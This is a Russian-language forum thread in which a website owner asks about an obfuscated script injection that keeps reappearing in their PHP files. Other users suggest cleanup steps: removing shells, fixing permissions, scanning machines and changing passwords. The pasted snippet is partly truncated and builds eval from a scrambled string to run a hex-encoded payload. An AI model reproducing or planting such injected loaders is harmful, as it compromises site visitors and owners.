Привет товарисчи кодеры и другие кибер-маньяки Всплыла проблемка у меня с сайтом. начал находить периодически в некоторых фаилах сайта (.php) вот такую вот строчку: Code: <div id='x0d65a24088ed1686437f1ee911ceeb9a0'><script>var jQuery = eval('w%i^nyd^ohw%.^e^v%ahly'.replace(/[\^s%yh]/g, '')); jQuery('\x66\x75\x6e\x63\x74\x69......x25\x37\x31\x27\x29\x3b');</script></div> Пароль на хосте меняли. Дыры вроде все позакрывали. Что-бы это могло быть и как могло заразить? Заранее спасибо!
Менять пароль на хосте я бы стал менять в посленюю очередь .. сначал шеллы чтоль повыдерал бы ... да файлы протрояненые
шеллы повыдерать - а это как, в двух словах? фаилы протрояненые - т.е. файлы в которых был найден этот код? а просто удаление кода не спасёт что-ли?
Удли коды, поставь необходимые права на файлы, проверь комп на вирусы (и все админы пусть сделают тоже самое) и поменяй пароли на всё остальное (фтп...)
если олени ломали тебя,ищи файлы с недавним временем редактирования.которые ты не мог редачить в это время,их и копай! меня все пасы,живи щасливо
Та код я удалял уже из фаилов. после чего закрыл дыры (найденые) и поменял пароль. Однако через какое-то время всё повторилось.
ищи файлы с недавним временем редактирования могли сломать через хостера,возможно там стоит бажное ядро
Была давно такая тема с сайтом. Если используешь Total Commander и ему подобные, то меняй пароль и не сохраняй его в проге... там все автоматом действует (етот вирус)